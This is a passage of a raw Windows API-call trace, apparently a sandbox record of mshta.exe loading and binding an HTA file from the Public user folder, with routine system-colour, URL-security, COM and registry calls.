lpbmi=0x19f3b8) returned 1 [0131.554] DeleteObject (ho=0xf050a62) returned 1 [0131.554] GetSysColor (nIndex=0) returned 0xc8c8c8 [0131.554] GetSysColor (nIndex=1) returned 0x0 [0131.554] GetSysColor (nIndex=2) returned 0xd1b499 [0131.554] GetSysColor (nIndex=3) returned 0xdbcdbf [0131.554] GetSysColor (nIndex=4) returned 0xf0f0f0 [0131.554] GetSysColor (nIndex=5) returned 0xffffff [0131.554] GetSysColor (nIndex=6) returned 0x646464 [0131.554] GetSysColor (nIndex=7) returned 0x0 [0131.554] GetSysColor (nIndex=8) returned 0x0 [0131.554] GetSysColor (nIndex=9) returned 0x0 [0131.554] GetSysColor (nIndex=10) returned 0xb4b4b4 [0131.554] GetSysColor (nIndex=11) returned 0xfcf7f4 [0131.554] GetSysColor (nIndex=12) returned 0xababab [0131.554] GetSysColor (nIndex=13) returned 0xff9933 [0131.554] GetSysColor (nIndex=14) returned 0xffffff [0131.554] GetSysColor (nIndex=15) returned 0xf0f0f0 [0131.554] GetSysColor (nIndex=16) returned 0xa0a0a0 [0131.554] GetSysColor (nIndex=17) returned 0x6d6d6d [0131.554] GetSysColor (nIndex=18) returned 0x0 [0131.555] GetSysColor (nIndex=19) returned 0x0 [0131.555] GetSysColor (nIndex=20) returned 0xffffff [0131.555] GetSysColor (nIndex=21) returned 0x696969 [0131.555] GetSysColor (nIndex=22) returned 0xe3e3e3 [0131.555] GetSysColor (nIndex=23) returned 0x0 [0131.555] GetSysColor (nIndex=24) returned 0xe1ffff [0131.555] GetSysColor (nIndex=25) returned 0x0 [0131.555] GetSysColor (nIndex=26) returned 0xcc6600 [0131.555] GetSysColor (nIndex=27) returned 0xead1b9 [0131.555] GetSysColor (nIndex=28) returned 0xf2e4d7 [0131.555] GetSysColor (nIndex=29) returned 0xff9933 [0131.555] GetSysColor (nIndex=30) returned 0xf0f0f0 [0131.555] GetSysColor (nIndex=31) returned 0x0 [0131.555] GetSysColor (nIndex=32) returned 0x0 [0131.555] GetSysColor (nIndex=33) returned 0x0 [0131.555] GetSysColor (nIndex=34) returned 0x0 [0131.555] GetSysColor (nIndex=35) returned 0x0 [0131.555] GetSysColor (nIndex=36) returned 0x0 [0131.555] GetSysColor (nIndex=37) returned 0x0 [0131.555] GetSysColor (nIndex=38) returned 0x0 [0131.555] GetSysColor (nIndex=39) returned 0x0 [0131.555] GetSysColor (nIndex=40) returned 0x0 [0131.555] GetSysColor (nIndex=41) returned 0x0 [0131.555] GetSysColor (nIndex=42) returned 0x0 [0131.555] GetSysColor (nIndex=43) returned 0x0 [0131.555] GetSysColor (nIndex=44) returned 0x0 [0131.555] GetSysColor (nIndex=45) returned 0x0 [0131.555] GetSysColor (nIndex=46) returned 0x0 [0131.555] GetSysColor (nIndex=47) returned 0x0 [0131.555] GetSysColor (nIndex=48) returned 0x0 [0131.555] GetSysColor (nIndex=49) returned 0x0 [0131.555] GetSysColor (nIndex=50) returned 0x0 [0131.556] GetSysColor (nIndex=51) returned 0x0 [0131.556] GetSysColor (nIndex=52) returned 0x0 [0131.556] GetSysColor (nIndex=53) returned 0x0 [0131.556] GetSysColor (nIndex=54) returned 0x0 [0131.556] GetSysColor (nIndex=55) returned 0x0 [0131.556] GetSysColor (nIndex=56) returned 0x0 [0131.556] GetSysColor (nIndex=57) returned 0x0 [0131.556] GetSysColor (nIndex=58) returned 0x0 [0131.556] GetSysColor (nIndex=59) returned 0x0 [0131.556] GetSysColor (nIndex=60) returned 0x0 [0131.556] GetSysColor (nIndex=61) returned 0x0 [0131.556] GetSysColor (nIndex=62) returned 0x0 [0131.556] GetSysColor (nIndex=63) returned 0x0 [0131.556] GetDeviceCaps (hdc=0xb010541, index=38) returned 32409 [0131.556] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1 [0131.556] IUri:GetAbsoluteUri (in: This=0x609dbc, pbstrAbsoluteUri=0x19fa20 | out: pbstrAbsoluteUri=0x19fa20*="file:///C:/Users/Public/powPowNext.hta") returned 0x0 [0131.556] GetCurrentProcessId () returned 0xe14 [0131.558] GetCurrentThreadId () returned 0xb48 [0131.558] GetCurrentThreadId () returned 0xb48 [0131.558] GetCurrentProcessId () returned 0xe14 [0131.558] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x609c38 [0131.558] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0131.558] IUnknown:Release (This=0x5f0b00) returned 0x1 [0131.558] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.558] GetProcAddress (hModule=0x703b0000, lpProcName=0x1e5) returned 0x703d8740 [0131.559] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f600 | out: lpflOldProtect=0x19f600*=0x4) returned 1 [0131.605] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x602a40 [0131.605] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.605] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.605] malloc (_Size=0xac) returned 0x8c04a0 [0131.606] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.606] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0131.606] GetKeyboardLayoutNameW (in: pwszKLID=0x19f62c | out: pwszKLID="00000409") returned 1 [0131.607] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x52) returned 0x60a278 [0131.607] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f668 | out: ppu=0x19f668) returned 0x0 [0131.607] CreateUri (in: pwzURI="file:///C:/Users/Public/powPowNext.hta", dwFlags=0x3002b84, dwReserved=0x0, ppURI=0x19f648 | out: ppURI=0x19f648*=0x609dbc) returned 0x0 [0131.607] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0131.608] IUnknown:AddRef (This=0x609dbc) returned 0x6 [0131.608] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0131.608] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f5fc, dwFlags=0x0 | out: pdwZone=0x19f5fc*=0xffffffff) returned 0x800c0011 [0131.609] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0131.609] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0131.609] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0131.609] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x2700, pPolicy=0x19f600, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0x19f5e0 | out: pPolicy=0x19f600*=0x0, pdwOutFlags=0x19f5e0*=0x0) returned 0x0 [0131.611] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x2700, pPolicy=0x19f600, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x19f600*=0x0) returned 0x0 [0131.611] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0131.611] IUnknown:Release (This=0x5f0b00) returned 0x1 [0131.611] IUnknown:Release (This=0x609dbc) returned 0x6 [0131.611] IUnknown:Release (This=0x609dbc) returned 0x5 [0131.611] IUnknown:AddRef (This=0x609dbc) returned 0x6 [0131.611] IUri:GetPropertyDWORD (in: This=0x609dbc, uriProp=0x11, pdwProperty=0x19f404, dwFlags=0x0 | out: pdwProperty=0x19f404*=0x9) returned 0x0 [0131.612] IUnknown:Release (This=0x609dbc) returned 0x5 [0131.612] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0131.612] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x52) returned 0x60be38 [0131.612] IUnknown:QueryInterface (in: This=0x6e8967bc, riid=0x703b4c58*(Data1=0xc90db44a, Data2=0x1902, Data3=0x451e, Data4=([0]=0xbd, [1]=0xf0, [2]=0x5c, [3]=0x89, [4]=0x66, [5]=0xb, [6]=0x52, [7]=0x8c)), ppvObject=0x19d370 | out: ppvObject=0x19d370*=0x0) returned 0x80004002 [0131.612] IInternetSecurityManager:GetSecurityId (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pbSecurityId=0x19f488, pcbSecurityId=0x19f484*=0x200, dwReserved=0x0 | out: pbSecurityId=0x19f488*=0x0, pcbSecurityId=0x19f484*=0x200) returned 0x800c0011 [0131.612] IUnknown:Release (This=0x5f0b00) returned 0x1 [0131.613] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60be38 | out: hHeap=0x5e0000) returned 1 [0131.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x609ae8 [0131.613] memcpy_s (in: _Destination=0x609ae8, _DestinationSize=0xa, _Source=0x19f488, _SourceSize=0xa | out: _Destination=0x609ae8) returned 0x0 [0131.613] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x52) returned 0x60be38 [0131.613] IUri:GetPropertyBSTR (in: This=0x609dbc, uriProp=0x3, pbstrProperty=0x19f804, dwFlags=0x2 | out: pbstrProperty=0x19f804*="") returned 0x1 [0131.613] IUri:GetPropertyBSTR (in: This=0x609dbc, uriProp=0x6, pbstrProperty=0x19f804, dwFlags=0x2 | out: pbstrProperty=0x19f804*="") returned 0x1 [0131.613] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.614] GetProcAddress (hModule=0x703b0000, lpProcName="CoInternetGetSession") returned 0x70418440 [0131.614] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f764 | out: lpflOldProtect=0x19f764*=0x4) returned 1 [0131.615] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x19f7ec, dwReserved=0x0 | out: ppIInternetSession=0x19f7ec*=0x5fc930) returned 0x0 [0131.615] IInternetSession:RegisterNameSpace (This=0x5fc930, pCF=0x6e784f90, rclsid=0x6d721068, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0131.615] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0131.615] IInternetSession:RegisterNameSpace (This=0x5fc930, pCF=0x6e784fb0, rclsid=0x6d7210a8, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0131.615] IUnknown:AddRef (This=0x6e784fb0) returned 0x1 [0131.616] IInternetSession:RegisterNameSpace (This=0x5fc930, pCF=0x6e785fa4, rclsid=0x6d721098, pwzProtocol="blob", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0131.616] StrCmpICW (pszStr1="file:///C:/Users/Public/powPowNext.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12 [0131.616] StrCmpICW (pszStr1="file:///C:/Users/Public/powPowNext.hta", pszStr2="res://ieframe.dll/PhishSite_Iframe.htm") returned -12 [0131.616] StrCmpICW (pszStr1="file:///C:/Users/Public/powPowNext.hta", pszStr2="res://ieframe.dll/BlockSite.htm") returned -12 [0131.616] StrCmpICW (pszStr1="file:///C:/Users/Public/powPowNext.hta", pszStr2="res://ieframe.dll/PhishSite_Iframe.htm") returned -12 [0131.617] LoadLibraryExW (lpLibFileName="urlmon.dll", hFile=0x0, dwFlags=0x0) returned 0x703b0000 [0131.618] GetProcAddress (hModule=0x703b0000, lpProcName=0x1d7) returned 0x70426570 [0131.618] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f714 | out: ppvObject=0x19f714*=0x5f5f5c) returned 0x0 [0131.633] IUnknown:Release (This=0x5f5f5c) returned 0xa [0131.634] IUnknown:AddRef (This=0x5f5f5c) returned 0xb [0131.634] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.634] malloc (_Size=0xa8) returned 0xbfc338 [0131.634] IUnknown:AddRef (This=0x5f5f5c) returned 0xc [0131.634] IUri:GetSchemeName (in: This=0x5f5f5c, pbstrSchemeName=0x19f6d0 | out: pbstrSchemeName=0x19f6d0*="file") returned 0x0 [0131.634] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f6c8 | out: ppvObject=0x19f6c8*=0x5f5f5c) returned 0x0 [0131.635] IUnknown:Release (This=0x5f5f5c) returned 0xc [0131.635] IUnknown:AddRef (This=0x5f5f5c) returned 0xd [0131.635] IUnknown:Release (This=0x5f5f5c) returned 0xc [0131.636] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.636] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.636] malloc (_Size=0xbc) returned 0xbfc3e8 [0131.636] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.637] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x19f784 | out: pdwScheme=0x19f784*=0x9) returned 0x0 [0131.637] IUri:IsEqual (in: This=0x609dbc, pUri=0x5f5f5c, pfEqual=0x19f7d4 | out: pfEqual=0x19f7d4*=1) returned 0x0 [0131.637] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.637] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x5fd028 [0131.637] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.637] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.638] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.638] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.638] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.639] malloc (_Size=0xc4) returned 0xbfc4b0 [0131.640] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0131.641] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.641] IUnknown:AddRef (This=0x5fc930) returned 0x3 [0131.641] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.642] IUnknown:AddRef (This=0x5f5f5c) returned 0xd [0131.642] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f708 | out: ppvObject=0x19f708*=0x5f5f5c) returned 0x0 [0131.643] IUnknown:Release (This=0x5f5f5c) returned 0xd [0131.643] IUnknown:AddRef (This=0x5f5f5c) returned 0xe [0131.643] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.644] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x610548 [0131.644] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x19f3cc, dwReserved=0x0 | out: ppSM=0x19f3cc*=0x5f0c00) returned 0x0 [0131.644] IUnknown:QueryInterface (in: This=0x5f0c00, riid=0x6d734ed8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x19f3d0 | out: ppvObject=0x19f3d0*=0x5f0c00) returned 0x0 [0131.644] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x5fd148 [0131.644] IInternetSecurityManager:SetSecuritySite (This=0x5f0c00, pSite=0x5fd14c) returned 0x0 [0131.645] IUnknown:AddRef (This=0x5f0c00) returned 0x3 [0131.645] IUnknown:Release (This=0x5f0c00) returned 0x2 [0131.645] IUnknown:Release (This=0x5f0c00) returned 0x1 [0131.645] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f3cc | out: ppvObject=0x19f3cc*=0x5f5f5c) returned 0x0 [0131.645] IUnknown:Release (This=0x5f5f5c) returned 0xe [0131.645] IUnknown:AddRef (This=0x5f5f5c) returned 0xf [0131.646] QueryPerformanceCounter (in: lpPerformanceCount=0x19f358 | out: lpPerformanceCount=0x19f358*=3095046460573) returned 1 [0131.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19f360 | out: lpSystemTimeAsFileTime=0x19f360*(dwLowDateTime=0x55104b12, dwHighDateTime=0x1d7d80b)) [0131.646] QueryPerformanceCounter (in: lpPerformanceCount=0x19f3b8 | out: lpPerformanceCount=0x19f3b8*=3095046481223) returned 1 [0131.646] IUnknown:AddRef (This=0x5f5f5c) returned 0x10 [0131.646] IUnknown:AddRef (This=0x5f5f5c) returned 0x11 [0131.646] IUnknown:AddRef (This=0x5f5f5c) returned 0x12 [0131.646] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f3b0 | out: ppvObject=0x19f3b0*=0x5f5f5c) returned 0x0 [0131.646] IUnknown:Release (This=0x5f5f5c) returned 0x12 [0131.647] IUnknown:AddRef (This=0x5f5f5c) returned 0x13 [0131.647] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0xd40d98 | out: pdwScheme=0xd40d98*=0x9) returned 0x0 [0131.647] IMoniker:IsSystemMoniker (in: This=0x5f2fa0, pdwMksys=0x19f454 | out: pdwMksys=0x19f454*=0x6) returned 0x0 [0131.713] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.714] GetProcAddress (hModule=0x703b0000, lpProcName="CoInternetParseIUri") returned 0x70418370 [0131.714] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f354 | out: lpflOldProtect=0x19f354*=0x4) returned 1 [0131.714] CoInternetParseIUri (in: pIUri=0x5f5f5c, ParseAction=0x9, dwFlags=0x0, pwzResult=0x19f458, cchResult=0x104, pcchResult=0x19f424, dwReserved=0x0 | out: pwzResult="C:\\Users\\Public\\powPowNext.hta", pcchResult=0x19f424) returned 0x0 [0131.716] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x42) returned 0x60bbf8 [0131.716] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\powPowNext.hta", lpFindFileData=0x19f180 | out: lpFindFileData=0x19f180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c49d03f, ftCreationTime.dwHighDateTime=0x1d7d80b, ftLastAccessTime.dwLowDateTime=0x4c49d03f, ftLastAccessTime.dwHighDateTime=0x1d7d80b, ftLastWriteTime.dwLowDateTime=0x4cc06535, ftLastWriteTime.dwHighDateTime=0x1d7d80b, nFileSizeHigh=0x0, nFileSizeLow=0xd12, dwReserved0=0x68002e, dwReserved1=0x610074, cFileName="powPowNext.hta", cAlternateFileName="POWPOW~1.HTA")) returned 0x5f2f20 [0131.716] FindClose (in: hFindFile=0x5f2f20 | out: hFindFile=0x5f2f20) returned 1 [0131.717] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f3cc | out: ppvObject=0x19f3cc*=0x5f5f5c) returned 0x0 [0131.717] IUnknown:Release (This=0x5f5f5c) returned 0x13 [0131.717] IUnknown:AddRef (This=0x5f5f5c) returned 0x14 [0131.717] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x52) returned 0x60bef0 [0131.717] IInternetSession:CreateBinding (in: This=0x5fc930, pbc=0x0, szUrl="file:///C:/Users/Public/powPowNext.hta", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x19f2e8, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x19f2e8*=0x5f64f0) returned 0x0 [0131.737] IUnknown:QueryInterface (in: This=0x5f64f0, riid=0x6d6f6158*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x19f2d0 | out: ppvObject=0x19f2d0*=0x0) returned 0x80004002 [0131.737] IUnknown:QueryInterface (in: This=0x5f64f0, riid=0x6d6f6148*(Data1=0xeb5cda44, Data2=0x5086, Data3=0x44fe, Data4=([0]=0xa9, [1]=0xb1, [2]=0xc6, [3]=0x42, [4]=0x13, [5]=0x53, [6]=0xa5, [7]=0x46)), ppvObject=0x19f2d8 | out: ppvObject=0x19f2d8*=0x5f6504) returned 0x0 [0131.751] IUnknown:Release (This=0x5f6504) returned 0x1 [0131.751] IUnknown:AddRef (This=0x5f64f0) returned 0x2 [0131.779] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x88) returned 0x60bf50 [0131.779] IUnknown:AddRef (This=0x5f0c00) returned 0x2 [0131.781] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.782] GetProcAddress (hModule=0x77180000, lpProcName="SHStrDupW") returned 0x771b75c0 [0131.782] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f230 | out: lpflOldProtect=0x19f230*=0x4) returned 1 [0131.783] SHStrDupW (in: psz="file:///C:/Users/Public/powPowNext.hta", ppwsz=0x60bfc4 | out: ppwsz=0x60bfc4*="file:///C:/Users/Public/powPowNext.hta") returned 0x0 [0131.792] GetCurrentProcess () returned 0xffffffff [0131.792] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19f29c | out: TokenHandle=0x19f29c*=0x29c) returned 1 [0131.792] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.793] LoadLibraryExA (lpLibFileName="api-ms-win-downlevel-advapi32-l2-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x74a40000 [0131.793] GetProcAddress (hModule=0x74a40000, lpProcName="ConvertSidToStringSidW") returned 0x74a4d3c0 [0131.793] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f21c | out: lpflOldProtect=0x19f21c*=0x4) returned 1 [0131.794] ConvertSidToStringSidW (in: Sid=0x610430*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0x19f2ac | out: StringSid=0x19f2ac*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe4) returned 0x610c10 [0131.794] _vsnwprintf (in: _Buffer=0x610c10, _BufferCount=0x71, _Format="%s%s", _ArgList=0x19f284 | out: _Buffer="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Parental Controls\\Users\\S-1-5-21-1560258661-3990802383-1811730007-1000") returned 112 [0131.794] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Parental Controls\\Users\\S-1-5-21-1560258661-3990802383-1811730007-1000", ulOptions=0x0, samDesired=0x101, phkResult=0x19f2a8 | out: phkResult=0x19f2a8*=0x0) returned 0x2 [0131.794] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610c10 | out: hHeap=0x5e0000) returned 1 [0131.794] LocalFree (hMem=0x60c0a0) returned 0x0 [0131.794] LocalFree (hMem=0x610430) returned 0x0 [0131.794] CloseHandle (hObject=0x29c) returned 1 [0131.798] IUnknown:QueryInterface (in: This=0x5f64f0, riid=0x6d822570*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x60bfd4 | out: ppvObject=0x60bfd4*=0x5f64f0) returned 0x0 [0131.798] IUnknown:QueryInterface (in: This=0x5f64f0, riid=0x6d6f6484*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x60bfb4 | out: ppvObject=0x60bfb4*=0x0) returned 0x80004002 [0131.798] IUnknown:Release (This=0x5f64f0) returned 0x2 [0131.800] IInternetProtocolRoot:Start (This=0x5f64f0, szUrl="file:///C:/Users/Public/powPowNext.hta", pOIProtSink=0x60bfcc, pOIBindInfo=0x60bf88, grfPI=0x10, dwReserved=0x0) returned 0x0 [0131.800] IUnknown:QueryInterface (in: This=0x60bfcc, riid=0x703c0d60*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x19f364 | out: ppvObject=0x19f364*=0x0) returned 0x80004002 [0131.801] IUnknown:AddRef (This=0x60bfcc) returned 0x5 [0131.801] IUnknown:AddRef (This=0x60bf88) returned 0x6 [0131.801] IUnknown:QueryInterface (in: This=0x60bf88, riid=0x703b3ed8*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x19f310 | out: ppvObject=0x19f310*=0x60bf88) returned 0x0 [0131.802] IInternetBindInfoEx:GetBindInfoEx (in: This=0x60bf88, grfBINDF=0x5f66d8, pbindinfo=0x5f66e0, grfBINDF2=0x5f66dc, pdwReserved=0x19f30c | out: grfBINDF=0x5f66d8*=0x20483, pbindinfo=0x5f66e0, grfBINDF2=0x5f66dc*=0x20704000, pdwReserved=0x19f30c*=0x0) returned 0x0 [0131.803] IUnknown:Release (This=0x60bf88) returned 0x6 [0131.803] IUnknown:AddRef (This=0x60bfcc) returned 0x7 [0131.803] IInternetProtocolSink:ReportProgress (This=0x60bfcc, ulStatusCode=0x1e, szStatusText=0x0) returned 0x0 [0131.803] IUnknown:Release (This=0x60bfcc) returned 0x6 [0131.803] IUnknown:AddRef (This=0x60bfcc) returned 0x7 [0131.804] IInternetProtocolSink:ReportProgress (This=0x60bfcc, ulStatusCode=0xb, szStatusText="") returned 0x0 [0131.806] QueryPerformanceCounter (in: lpPerformanceCount=0x19eca0 | out: lpPerformanceCount=0x19eca0*=3095062528766) returned 1 [0131.806] IUnknown:Release (This=0x60bfcc) returned 0x6 [0131.807] IUnknown:AddRef (This=0x60bfcc) returned 0x7 [0131.807] IInternetProtocolSink:ReportProgress (This=0x60bfcc, ulStatusCode=0x3f, szStatusText="3346") returned 0x0 [0131.808] _wtoi64 (_String="3346") returned 3346 [0131.808] IUnknown:Release (This=0x60bfcc) returned 0x6 [0131.808] IUnknown:AddRef (This=0x60bfcc) returned 0x7 [0131.808] IInternetProtocolSink:ReportProgress (This=0x60bfcc, ulStatusCode=0xe, szStatusText="C:\\Users\\Public\\powPowNext.hta") returned 0x0 [0131.808] GetCurrentProcessId () returned 0xe14 [0131.808] IUnknown:Release (This=0x60bfcc) returned 0x6 [0131.809] IUnknown:AddRef (This=0x60bfcc) returned 0x7 [0131.809] IInternetProtocolSink:ReportProgress (This=0x60bfcc, ulStatusCode=0xd, szStatusText="application/hta") returned 0x0 [0131.809] RegisterClipboardFormatW (lpszFormat="text/html") returned 0xc0ff [0131.809] RegisterClipboardFormatW (lpszFormat="text/plain") returned 0xc101 [0131.809] RegisterClipboardFormatW (lpszFormat="text/xml") returned 0xc124 [0131.809] RegisterClipboardFormatW 